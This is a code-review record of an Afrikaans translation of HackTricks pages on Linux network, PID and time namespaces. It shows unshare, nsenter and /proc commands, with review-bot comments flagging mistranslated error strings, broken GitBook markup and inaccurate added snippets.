dit moontlik vir 'n proses om nuwe namespaces te skep deur die `unshare`-stelseloproep te gebruik. Die proses wat die skepping van 'n nuwe PID-namespace inisieer (bekend as die "unshare"-proses) betree egter nie die nuwe namespace nie; slegs sy kinderprosesse doen dit. +- Die uitvoering van `%unshare -p /bin/bash%` begin `/bin/bash` in dieselfde proses as `unshare`. Gevolglik is `/bin/bash` en sy kinderprosesse in die oorspronklike PID-namespace. +- Die eerste kinderproses van `/bin/bash` in die nuwe namespace word PID 1. 
Wanneer hierdie proses afsluit, veroorsaak dit die skoonmaak van die namespace as daar geen ander prosesse is nie, aangesien PID 1 die spesiale rol het om weeskindprosesse aan te neem. Die Linux-kernel sal dan PID-toekenning in daardie namespace deaktiveer. -2. **Consequence**: - - The exit of PID 1 in a new namespace leads to the cleaning of the `PIDNS_HASH_ADDING` flag. This results in the `alloc_pid` function failing to allocate a new PID when creating a new process, producing the "Cannot allocate memory" error. +2. **Gevolg**: +- Die afsluiting van PID 1 in 'n nuwe namespace lei tot die skoonmaak van die `PIDNS_HASH_ADDING`-vlag. Dit veroorsaak dat die `alloc_pid`-funksie misluk om 'n nuwe PID toe te ken wanneer 'n nuwe proses geskep word, wat die "Kan nie geheue toewys nie" -fout veroorsaak. -3. **Solution**: - - The issue can be resolved by using the `-f` option with `unshare`. This option makes `unshare` fork a new process after creating the new PID namespace. - - Executing `%unshare -fp /bin/bash%` ensures that the `unshare` command itself becomes PID 1 in the new namespace. `/bin/bash` and its child processes are then safely contained within this new namespace, preventing the premature exit of PID 1 and allowing normal PID allocation. +3. **Oplossing**: +- Die probleem kan opgelos word deur die `-f`-opsie saam met `unshare` te gebruik. Hierdie opsie maak `unshare` 'n nuwe proses na die skepping van die nuwe PID-namespace. +- Deur `%unshare -fp /bin/bash%` uit te voer, verseker jy dat die `unshare`-opdrag self PID 1 in die nuwe namespace word. `/bin/bash` en sy kinderprosesse word dan veilig binne hierdie nuwe namespace gehou, wat die voortydige afsluiting van PID 1 voorkom en normale PID-toekenning moontlik maak. -By ensuring that `unshare` runs with the `-f` flag, the new PID namespace is correctly maintained, allowing `/bin/bash` and its sub-processes to operate without encountering the memory allocation error. 
+Deur te verseker dat `unshare` met die `-f`-vlag uitgevoer word, word die nuwe PID-namespace korrek onderhou, sodat `/bin/bash` en sy subprosesse kan werk sonder om die geheue-toewysingsfout te ondervind.
#### Docker - ```bash docker run -ti --name ubuntu1 -v /usr:/ubuntu1 ubuntu bash # Run ifconfig or ip -a ``` +### Kyk watter namespace jou proses in is -### Check which namespace is your process in +Om te bepaal in watter namespace jou proses tans is, kan jy die volgende opdrag gebruik: +```bash +ls -l /proc/$$/ns +``` + +Hier is die betekenis van die vlags in die uitset: + +- `mnt`: Die bergingsnamespace +- `pid`: Die prosesnamespace +- `net`: Die netwerknamespace +- `ipc`: Die interproseskommunikasienamespace +- `uts`: Die stelselidentiteitsnamespace +- `user`: Die gebruikersnamespace + +As jy die uitset van die opdrag sien, kan jy bepaal in watter namespace jou proses tans is deur te kyk na die simboliese skakels wat na die aktiewe namespaces verwys. ```bash ls -l /proc/self/ns/net lrwxrwxrwx 1 root root 0 Apr 4 20:30 /proc/self/ns/net -> 'net:[4026531840]' ``` - -### Find all Network namespaces +### Vind alle Netwerk namespaces {% code overflow="wrap" %} ```bash 
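Review bot: The error line `+Fout: bash: fork: Kan nie geheue toewys nie` translates quoted program output; bash prints `Cannot allocate memory` (strerror for ENOMEM), and readers search for that exact string, so keep `Error: bash: fork: Cannot allocate memory` verbatim and translate only the surrounding prose. In the same block the sub-bullets under the numbered items lost their leading indentation (`+- Die Linux-kernel ...` at column 0 where the original had `    - The Linux kernel ...`), which un-nests them into a separate list; restore the indent. The sentence "Hierdie opsie maak `unshare` 'n nuwe proses" drops the verb "fork" (it now reads "makes unshare a new process"); "laat `unshare` 'n nuwe proses fork" keeps the meaning. Two further points: the blank lines around the `#### CLI` fence (the removed `-` lines before and after ```` ```bash ````) should stay for GitBook rendering, and the new "Kyk watter namespace jou proses in is" block (`+ls -l /proc/$$/ns` plus the list of entries) is content that does not exist in the English source; it also calls the entries "vlags" although they are symlinks to namespace inodes and omits `cgroup` and `time`. A translation PR should not add material, so drop it or land it in the English page first.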
@@ -82,29 +93,29 @@ sudo find /proc -maxdepth 3 -type l -name net -exec readlink {} \; 2>/dev/null | # Find the processes with an specific namespace sudo find /proc -maxdepth 3 -type l -name net -exec ls -l {} \; 2>/dev/null | grep ``` +{% code %} + +### Betree 'n Netwerk-namespace + {% endcode %} - -### Enter inside a Network namespace - ```bash nsenter -n TARGET_PID --pid /bin/bash ``` +Verder kan jy slegs **toegang verkry tot 'n ander proses-namespace as jy root is**. En jy **kan nie** **toegang kry** tot 'n ander namespace **sonder 'n beskrywer** wat daarna verwys nie (soos `/proc/self/ns/net`). -Also, you can only **enter in another process namespace if you are root**. And you **cannot** **enter** in other namespace **without a descriptor** pointing to it (like `/proc/self/ns/net`). - -## References +## Verwysings * [https://stackoverflow.com/questions/44666700/unshare-pid-bin-bash-fork-cannot-allocate-memory](https://stackoverflow.com/questions/44666700/unshare-pid-bin-bash-fork-cannot-allocate-memory)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hack-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
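Review bot: The `{% code %}` / `{% endcode %}` placement is broken in this hunk: a bare `+{% code %}` is inserted after the closing fence of the find command, then `+### Betree 'n Netwerk-namespace`, and only then the existing `{% endcode %}`, so the heading ends up inside the GitBook code block and the `{% code overflow="wrap" %}` opened above the fence now has two openers for one closer. Delete the added `{% code %}` line and keep `{% endcode %}` immediately after the ```` ``` ```` that closes the `sudo find ...` block, with the heading and a blank line after it.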
diff --git a/linux-hardening/privilege-escalation/docker-security/namespaces/pid-namespace.md b/linux-hardening/privilege-escalation/docker-security/namespaces/pid-namespace.md index 60b5fec57..cc62c92a6 100644 --- a/linux-hardening/privilege-escalation/docker-security/namespaces/pid-namespace.md +++ b/linux-hardening/privilege-escalation/docker-security/namespaces/pid-namespace.md @@ -1,82 +1,84 @@ -# PID Namespace +# PID Naamruimte
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Basic Information +## Basiese Inligting -The PID (Process IDentifier) namespace is a feature in the Linux kernel that provides process isolation by enabling a group of processes to have their own set of unique PIDs, separate from the PIDs in other namespaces. This is particularly useful in containerization, where process isolation is essential for security and resource management. +Die PID (Process IDentifier) naamruimte is 'n kenmerk in die Linux-kernel wat proses-isolasie bied deur 'n groep prosesse te voorsien van hul eie stel unieke PIDs, afsonderlik van die PIDs in ander naamruimtes. Dit is veral nuttig in konteinering, waar proses-isolasie noodsaaklik is vir sekuriteit en hulpbronbestuur. -When a new PID namespace is created, the first process in that namespace is assigned PID 1. This process becomes the "init" process of the new namespace and is responsible for managing other processes within the namespace. Each subsequent process created within the namespace will have a unique PID within that namespace, and these PIDs will be independent of PIDs in other namespaces. +Wanneer 'n nuwe PID-naamruimte geskep word, word die eerste proses in daardie naamruimte toegewys aan PID 1. Hierdie proses word die "init" proses van die nuwe naamruimte en is verantwoordelik vir die bestuur van ander prosesse binne die naamruimte. Elke volgende proses wat binne die naamruimte geskep word, sal 'n unieke PID binne daardie naamruimte hê, en hierdie PIDs sal onafhanklik wees van PIDs in ander naamruimtes. -From the perspective of a process within a PID namespace, it can only see other processes in the same namespace. It is not aware of processes in other namespaces, and it cannot interact with them using traditional process management tools (e.g., `kill`, `wait`, etc.). This provides a level of isolation that helps prevent processes from interfering with one another. 
+Vanuit die perspektief van 'n proses binne 'n PID-naamruimte kan dit slegs ander prosesse in dieselfde naamruimte sien. Dit is nie bewus van prosesse in ander naamruimtes nie, en dit kan nie met hulle interaksie hê deur gebruik te maak van tradisionele prosesbestuurstelsels (bv. `kill`, `wait`, ens.). Dit bied 'n vlak van isolasie wat help voorkom dat prosesse mekaar versteur. -### How it works: +### Hoe dit werk: -1. When a new process is created (e.g., by using the `clone()` system call), the process can be assigned to a new or existing PID namespace. **If a new namespace is created, the process becomes the "init" process of that namespace**. -2. The **kernel** maintains a **mapping between the PIDs in the new namespace and the corresponding PIDs** in the parent namespace (i.e., the namespace from which the new namespace was created). This mapping **allows the kernel to translate PIDs when necessary**, such as when sending signals between processes in different namespaces. -3. **Processes within a PID namespace can only see and interact with other processes in the same namespace**. They are not aware of processes in other namespaces, and their PIDs are unique within their namespace. -4. When a **PID namespace is destroyed** (e.g., when the "init" process of the namespace exits), **all processes within that namespace are terminated**. This ensures that all resources associated with the namespace are properly cleaned up. +1. Wanneer 'n nuwe proses geskep word (bv. deur die `clone()` stelseloproep te gebruik), kan die proses toegewys word aan 'n nuwe of bestaande PID-naamruimte. **As 'n nuwe naamruimte geskep word, word die proses die "init" proses van daardie naamruimte**. +2. Die **kernel** handhaaf 'n **koppeling tussen die PIDs in die nuwe naamruimte en die ooreenstemmende PIDs** in die ouer-naamruimte (dit wil sê die naamruimte waaruit die nuwe naamruimte geskep is). 
Hierdie koppeling **stel die kernel in staat om PIDs te vertaal wanneer dit nodig is**, soos wanneer seine tussen prosesse in verskillende naamruimtes gestuur word. +3. **Prosesse binne 'n PID-naamruimte kan slegs ander prosesse in dieselfde naamruimte sien en daarmee interaksie hê**. Hulle is nie bewus van prosesse in ander naamruimtes nie, en hul PIDs is uniek binne hul naamruimte. +4. Wanneer 'n **PID-naamruimte vernietig word** (bv. wanneer die "init" proses van die naamruimte afsluit), **word alle prosesse binne daardie naamruimte beëindig**. Dit verseker dat alle hulpbronne wat met die naamruimte verband hou, behoorlik skoongemaak word. -## Lab: +## Laboratorium: -### Create different Namespaces +### Skep verskillende Naamruimtes #### CLI - ```bash sudo unshare -pf --mount-proc /bin/bash ``` -
-Error: bash: fork: Cannot allocate memory +Fout: bash: fork: Kan nie geheue toewys nie -When `unshare` is executed without the `-f` option, an error is encountered due to the way Linux handles new PID (Process ID) namespaces. The key details and the solution are outlined below: +Wanneer `unshare` uitgevoer word sonder die `-f` opsie, word 'n fout aangetref as gevolg van die manier waarop Linux nuwe PID (Process ID) namespaces hanteer. Die sleutelbesonderhede en die oplossing word hieronder uiteengesit: -1. **Problem Explanation**: - - The Linux kernel allows a process to create new namespaces using the `unshare` system call. However, the process that initiates the creation of a new PID namespace (referred to as the "unshare" process) does not enter the new namespace; only its child processes do. - - Running `%unshare -p /bin/bash%` starts `/bin/bash` in the same process as `unshare`. Consequently, `/bin/bash` and its child processes are in the original PID namespace. - - The first child process of `/bin/bash` in the new namespace becomes PID 1. When this process exits, it triggers the cleanup of the namespace if there are no other processes, as PID 1 has the special role of adopting orphan processes. The Linux kernel will then disable PID allocation in that namespace. +1. **Probleemverduideliking**: +- Die Linux-kernel maak dit moontlik vir 'n proses om nuwe namespaces te skep deur die `unshare` stelseloproep te gebruik. Die proses wat die skepping van 'n nuwe PID-namespace inisieer (bekend as die "unshare" proses) betree egter nie die nuwe namespace nie; slegs sy kinderprosesse doen dit. +- Die uitvoering van `%unshare -p /bin/bash%` begin `/bin/bash` in dieselfde proses as `unshare`. Gevolglik is `/bin/bash` en sy kinderprosesse in die oorspronklike PID-namespace. +- Die eerste kinderproses van `/bin/bash` in die nuwe namespace word PID 1. 
Wanneer hierdie proses afsluit, veroorsaak dit die skoonmaak van die namespace as daar geen ander prosesse is nie, aangesien PID 1 die spesiale rol het om weeskindprosesse aan te neem. Die Linux-kernel sal dan PID-toekenning in daardie namespace deaktiveer. -2. **Consequence**: - - The exit of PID 1 in a new namespace leads to the cleaning of the `PIDNS_HASH_ADDING` flag. This results in the `alloc_pid` function failing to allocate a new PID when creating a new process, producing the "Cannot allocate memory" error. +2. **Gevolg**: +- Die afsluiting van PID 1 in 'n nuwe namespace lei tot die skoonmaak van die `PIDNS_HASH_ADDING` vlag. Dit veroorsaak dat die `alloc_pid`-funksie nie 'n nuwe PID kan toeken wanneer 'n nuwe proses geskep word nie, wat die "Kan nie geheue toewys nie" fout veroorsaak. -3. **Solution**: - - The issue can be resolved by using the `-f` option with `unshare`. This option makes `unshare` fork a new process after creating the new PID namespace. - - Executing `%unshare -fp /bin/bash%` ensures that the `unshare` command itself becomes PID 1 in the new namespace. `/bin/bash` and its child processes are then safely contained within this new namespace, preventing the premature exit of PID 1 and allowing normal PID allocation. +3. **Oplossing**: +- Die probleem kan opgelos word deur die `-f` opsie saam met `unshare` te gebruik. Hierdie opsie maak `unshare` 'n nuwe proses na die skepping van die nuwe PID-namespace. +- Deur `%unshare -fp /bin/bash%` uit te voer, verseker jy dat die `unshare`-opdrag self PID 1 in die nuwe namespace word. `/bin/bash` en sy kinderprosesse word dan veilig binne hierdie nuwe namespace gehou, wat die vroeë afsluiting van PID 1 voorkom en normale PID-toekenning moontlik maak. -By ensuring that `unshare` runs with the `-f` flag, the new PID namespace is correctly maintained, allowing `/bin/bash` and its sub-processes to operate without encountering the memory allocation error. 
+Deur te verseker dat `unshare` met die `-f` vlag uitgevoer word, word die nuwe PID-namespace korrek onderhou, sodat `/bin/bash` en sy subprosesse kan werk sonder om die geheue-toewysingsfout te ondervind.
-By mounting a new instance of the `/proc` filesystem if you use the param `--mount-proc`, you ensure that the new mount namespace has an **accurate and isolated view of the process information specific to that namespace**. +Deur 'n nuwe instansie van die `/proc`-lêersisteem te monteer as jy die parameter `--mount-proc` gebruik, verseker jy dat die nuwe bergnamespace 'n **akkurate en geïsoleerde siening van die prosesinligting spesifiek vir daardie namespace** het. #### Docker - ```bash docker run -ti --name ubuntu1 -v /usr:/ubuntu1 ubuntu bash ``` +### Kyk watter namespace jou proses in is -### Check which namespace are your process in +Om te bepaal in watter namespace jou proses tans is, kan jy die volgende opdrag gebruik: +```bash +cat /proc/$$/status | grep NSpid +``` + +Hierdie opdrag sal die PID (Process ID) van die proses toon, tesame met die namespace waarin dit bestaan. ```bash ls -l /proc/self/ns/pid lrwxrwxrwx 1 root root 0 Apr 3 18:45 /proc/self/ns/pid -> 'pid:[4026532412]' ``` - -### Find all PID namespaces +### Vind alle PID-ruimtes {% code overflow="wrap" %} ```bash 
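Review bot: Terminology switches mid-file: the first half renders namespace as "naamruimte" (`+# PID Naamruimte`, `+Wanneer 'n nuwe PID-naamruimte geskep word`) while from the `+Fout:` paragraph onward it uses "namespace" (`+... die nuwe PID-namespace ...`); pick one (the network and time pages in this patch use "namespace") and apply it throughout. The added `+cat /proc/$$/status | grep NSpid` block is new content and its description is inaccurate: `NSpid` lists the process's PID as seen from each enclosing PID namespace, it does not show which namespace the process is in; the existing `ls -l /proc/self/ns/pid` line right below already answers that, so drop the addition. The same defects as in network-namespace.md recur here: the translated error string (keep `Error: bash: fork: Cannot allocate memory` verbatim), the de-indented `- ` sub-bullets under items 1 to 3, "maak `unshare` 'n nuwe proses" losing the verb "fork", and the blank lines removed around the ```` ```bash ```` fences.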
@@ -84,31 +86,29 @@ sudo find /proc -maxdepth 3 -type l -name pid -exec readlink {} \; 2>/dev/null | ``` {% endcode %} -Note that the root use from the initial (default) PID namespace can see all the processes, even the ones in new PID names paces, thats why we can see all the PID namespaces. - -### Enter inside a PID namespace +Let daarop dat die root-gebruiker van die aanvanklike (standaard) PID-naamruimte al die prosesse kan sien, selfs diegene in nuwe PID-naamruimtes. Dit is hoekom ons al die PID-naamruimtes kan sien. +### Betree 'n PID-naamruimte ```bash nsenter -t TARGET_PID --pid /bin/bash ``` +Wanneer jy binne 'n PID-namespace gaan vanaf die verstek-namespace, sal jy steeds al die prosesse kan sien. En die proses van daardie PID-ns sal die nuwe bash op die PID-ns kan sien. -When you enter inside a PID namespace from the default namespace, you will still be able to see all the processes. And the process from that PID ns will be able to see the new bash on the PID ns. +Jy kan ook slegs **binne 'n ander proses-PID-namespace gaan as jy root is**. En jy **kan nie** **binne** 'n ander namespace **ingaan sonder 'n beskrywer** wat daarna verwys nie (soos `/proc/self/ns/pid`) -Also, you can only **enter in another process PID namespace if you are root**. And you **cannot** **enter** in other namespace **without a descriptor** pointing to it (like `/proc/self/ns/pid`) - -## References +## Verwysings * [https://stackoverflow.com/questions/44666700/unshare-pid-bin-bash-fork-cannot-allocate-memory](https://stackoverflow.com/questions/44666700/unshare-pid-bin-bash-fork-cannot-allocate-memory)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hack-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
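Review bot: Blank lines were dropped around the heading: `+Let daarop dat die root-gebruiker ...` is immediately followed by `+### Betree 'n PID-naamruimte` and the blank line before the ```` ```bash ```` fence is gone, which GitBook needs to render the fence; restore both. The heading also uses "naamruimte" while the paragraph beneath it (`+Wanneer jy binne 'n PID-namespace gaan ...`) uses "namespace", the same inconsistency as in the first hunk of this file.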
diff --git a/linux-hardening/privilege-escalation/docker-security/namespaces/time-namespace.md b/linux-hardening/privilege-escalation/docker-security/namespaces/time-namespace.md index d37ca7413..6a07cd803 100644 --- a/linux-hardening/privilege-escalation/docker-security/namespaces/time-namespace.md +++ b/linux-hardening/privilege-escalation/docker-security/namespaces/time-namespace.md @@ -1,71 +1,73 @@ -# Time Namespace +# Tyd-Namespace
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Basic Information +## Basiese Inligting -The time namespace in Linux allows for per-namespace offsets to the system monotonic and boot-time clocks. It is commonly used in Linux containers to change the date/time within a container and adjust clocks after restoring from a checkpoint or snapshot. +Die tyd-namespace in Linux maak dit moontlik om per-namespace verskuiwings na die stelsel se monotone en opstarttydklokke te hê. Dit word algemeen gebruik in Linux-houers om die datum/tyd binne 'n houer te verander en klokke aan te pas nadat dit van 'n kontrolepunt of afskakeling herstel is. -## Lab: +## Laboratorium: -### Create different Namespaces +### Skep verskillende Namespaces #### CLI - ```bash sudo unshare -T [--mount-proc] /bin/bash ``` - -By mounting a new instance of the `/proc` filesystem if you use the param `--mount-proc`, you ensure that the new mount namespace has an **accurate and isolated view of the process information specific to that namespace**. +Deur 'n nuwe instansie van die `/proc`-lêersisteem te monteer as jy die parameter `--mount-proc` gebruik, verseker jy dat die nuwe berg-namespace 'n **akkurate en geïsoleerde siening van die prosesinligting spesifiek vir daardie namespace** het.
-Error: bash: fork: Cannot allocate memory +Fout: bash: fork: Kan nie geheue toewys nie -When `unshare` is executed without the `-f` option, an error is encountered due to the way Linux handles new PID (Process ID) namespaces. The key details and the solution are outlined below: +Wanneer `unshare` uitgevoer word sonder die `-f`-opsie, word 'n fout aangetref as gevolg van die manier waarop Linux nuwe PID (Proses-ID) namespaces hanteer. Die sleuteldetails en die oplossing word hieronder uiteengesit: -1. **Problem Explanation**: - - The Linux kernel allows a process to create new namespaces using the `unshare` system call. However, the process that initiates the creation of a new PID namespace (referred to as the "unshare" process) does not enter the new namespace; only its child processes do. - - Running `%unshare -p /bin/bash%` starts `/bin/bash` in the same process as `unshare`. Consequently, `/bin/bash` and its child processes are in the original PID namespace. - - The first child process of `/bin/bash` in the new namespace becomes PID 1. When this process exits, it triggers the cleanup of the namespace if there are no other processes, as PID 1 has the special role of adopting orphan processes. The Linux kernel will then disable PID allocation in that namespace. +1. **Probleemverduideliking**: +- Die Linux-kernel maak dit moontlik vir 'n proses om nuwe namespaces te skep deur die `unshare`-stelseloproep te gebruik. Die proses wat die skepping van 'n nuwe PID-namespace inisieer (bekend as die "unshare"-proses) betree egter nie die nuwe namespace nie; slegs sy kinderprosesse doen dit. +- Die uitvoering van `%unshare -p /bin/bash%` begin `/bin/bash` in dieselfde proses as `unshare`. Gevolglik is `/bin/bash` en sy kinderprosesse in die oorspronklike PID-namespace. +- Die eerste kinderproses van `/bin/bash` in die nuwe namespace word PID 1. 
Wanneer hierdie proses afsluit, veroorsaak dit die skoonmaak van die namespace as daar geen ander prosesse is nie, aangesien PID 1 die spesiale rol het om weeskindprosesse aan te neem. Die Linux-kernel sal dan PID-toekenning in daardie namespace deaktiveer. -2. **Consequence**: - - The exit of PID 1 in a new namespace leads to the cleaning of the `PIDNS_HASH_ADDING` flag. This results in the `alloc_pid` function failing to allocate a new PID when creating a new process, producing the "Cannot allocate memory" error. +2. **Gevolg**: +- Die afsluiting van PID 1 in 'n nuwe namespace lei tot die skoonmaak van die `PIDNS_HASH_ADDING`-vlag. Dit veroorsaak dat die `alloc_pid`-funksie misluk om 'n nuwe PID toe te ken wanneer 'n nuwe proses geskep word, wat die "Kan nie geheue toewys nie" -fout veroorsaak. -3. **Solution**: - - The issue can be resolved by using the `-f` option with `unshare`. This option makes `unshare` fork a new process after creating the new PID namespace. - - Executing `%unshare -fp /bin/bash%` ensures that the `unshare` command itself becomes PID 1 in the new namespace. `/bin/bash` and its child processes are then safely contained within this new namespace, preventing the premature exit of PID 1 and allowing normal PID allocation. +3. **Oplossing**: +- Die probleem kan opgelos word deur die `-f`-opsie saam met `unshare` te gebruik. Hierdie opsie maak `unshare` 'n nuwe proses na die skepping van die nuwe PID-namespace. +- Deur `%unshare -fp /bin/bash%` uit te voer, verseker jy dat die `unshare`-opdrag self PID 1 in die nuwe namespace word. `/bin/bash` en sy kinderprosesse word dan veilig binne hierdie nuwe namespace gehou, wat die voortydige afsluiting van PID 1 voorkom en normale PID-toekenning moontlik maak. -By ensuring that `unshare` runs with the `-f` flag, the new PID namespace is correctly maintained, allowing `/bin/bash` and its sub-processes to operate without encountering the memory allocation error. 
+Deur te verseker dat `unshare` met die `-f`-vlag uitgevoer word, word die nuwe PID-namespace korrek onderhou, sodat `/bin/bash` en sy subprosesse kan werk sonder om die geheue-toewysingsfout te ondervind.
#### Docker - ```bash docker run -ti --name ubuntu1 -v /usr:/ubuntu1 ubuntu bash ``` +### Kyk watter namespace jou proses in is -### Check which namespace is your process in +Om te bepaal in watter namespace jou proses tans is, kan jy die volgende opdrag gebruik: +```bash +cat /proc/$$/ns/pid +``` + +Hier is 'pid' die identifikasienommer van die proses waarvoor jy die namespace wil bepaal. ```bash ls -l /proc/self/ns/time lrwxrwxrwx 1 root root 0 Apr 4 21:16 /proc/self/ns/time -> 'time:[4026531834]' ``` - -### Find all Time namespaces +### Vind alle Tyd namespaces {% code overflow="wrap" %} ```bash 
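Review bot: the translated line under `3. Oplossing` drops the verb: `Hierdie opsie maak `unshare` 'n nuwe proses na die skepping van die nuwe PID-namespace` says the option turns unshare into a new process, while the removed English line says it makes unshare fork a new process; suggest `Hierdie opsie laat `unshare` 'n nuwe proses vork nadat die nuwe PID-namespace geskep is`. The paragraph added under `### Kyk watter namespace jou proses in is` is not in the English source and is wrong for this page: `cat /proc/$$/ns/pid` points at the pid namespace, not the time namespace, and the sentence after it describes `pid` as the process ID when in that path it is the namespace type (the process ID is `$$`); the unchanged `ls -l /proc/self/ns/time` line that follows already shows the intended check, so drop the added paragraph or change the command to `readlink /proc/$$/ns/time`. The hunk also deletes the blank lines around the code fences (for example between `#### Docker` and its fence), which is unrelated to translation and only bloats the diff.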
